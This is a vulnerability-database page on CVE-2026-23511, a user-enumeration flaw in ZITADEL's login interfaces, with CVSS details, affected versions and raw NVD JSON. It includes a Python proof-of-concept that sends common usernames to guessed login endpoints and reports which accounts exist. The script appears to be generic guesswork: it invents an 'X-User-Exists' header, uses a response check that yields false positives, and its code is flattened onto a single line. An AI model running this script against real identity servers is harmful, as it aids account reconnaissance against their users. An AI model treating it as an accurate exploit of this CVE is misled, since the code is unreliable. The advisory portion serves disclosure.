Security Vulnerability Report
中文
CVE-2026-23511 CVSS 5.3 MEDIUM

CVE-2026-23511

Published: 2026-01-15 20:16:05
Last Modified: 2026-01-20 16:44:43
Source: [email protected]

Description

ZITADEL is an open source identity management platform. Prior to 4.9.1 and 3.4.6, a user enumeration vulnerability has been discovered in Zitadel's login interfaces. An unauthenticated attacker can exploit this flaw to confirm the existence of valid user accounts by iterating through usernames and userIDs. This vulnerability is fixed in 4.9.1 and 3.4.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE
ZITADEL < 4.9.1
ZITADEL < 3.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2026-23511 PoC - ZITADEL User Enumeration # Target: ZITADEL instance with vulnerable login interface TARGET_URL = "https://target-zitadel-instance.com" TEST_USERNAMES = ["admin", "test", "user", "administrator", "root"] def check_user_exists(username): """Check if a user exists by analyzing login interface response""" # Try different login endpoints endpoints = [ "/ui/console/login", "/oauth/v2/login", "/login", "/api/v1/users/_search" ] for endpoint in endpoints: url = f"{TARGET_URL}{endpoint}" # Method 1: Timing-based check start_time = time.time() response = requests.post(url, data={"username": username}, timeout=10) response_time = time.time() - start_time # Method 2: Response analysis if response.status_code == 200: # Check for user-specific error messages if "user not found" not in response.text.lower() and \ "invalid username" not in response.text.lower(): return True, endpoint, response_time # Method 3: Check response headers/length if response.headers.get('X-User-Exists') == 'true': return True, endpoint, response_time return False, None, None def main(): print(f"[*] Scanning for valid users on {TARGET_URL}") print("=" * 50) valid_users = [] for username in TEST_USERNAMES: exists, endpoint, resp_time = check_user_exists(username) if exists: print(f"[+] User found: {username} (via {endpoint}, time: {resp_time:.3f}s)") valid_users.append(username) else: print(f"[-] User not found: {username}") print("=" * 50) print(f"[*] Found {len(valid_users)} valid user(s)") return valid_users if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23511", "sourceIdentifier": "[email protected]", "published": "2026-01-15T20:16:05.167", "lastModified": "2026-01-20T16:44:43.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZITADEL is an open source identity management platform. Prior to 4.9.1 and 3.4.6, a user enumeration vulnerability has been discovered in Zitadel's login interfaces. An unauthenticated attacker can exploit this flaw to confirm the existence of valid user accounts by iterating through usernames and userIDs. This vulnerability is fixed in 4.9.1 and 3.4.6."}, {"lang": "es", "value": "ZITADEL es una plataforma de gestión de identidad de código abierto. Antes de 4.9.1 y 3.4.6, se ha descubierto una vulnerabilidad de enumeración de usuarios en las interfaces de inicio de sesión de Zitadel. Un atacante no autenticado puede explotar esta falla para confirmar la existencia de cuentas de usuario válidas al iterar a través de nombres de usuario y userIDs. Esta vulnerabilidad está corregida en 4.9.1 y 3.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndIncluding": "2.71.19", "matchCriteriaId": "AFFBAC9C-9A67-4AF4-985C-31DCC2F1311D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.4.6", "matchCriteriaId": "35824976-F697-4F42-8224-C8CE077BAB46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.9.1", "matchCriteriaId": "1B68D0EF-0AB9-4429-AA04-8FED60B814C9"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/b85ab69e4679b0268e2b0e9b4cd04e934af10dd2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/commit/c300d4cc6a2775ab17ddfe76492f24170f8b858d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/releases/tag/v3.4.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zitadel/zitadel/releases/tag/v4.9.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-pvm5-9frx-264r", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.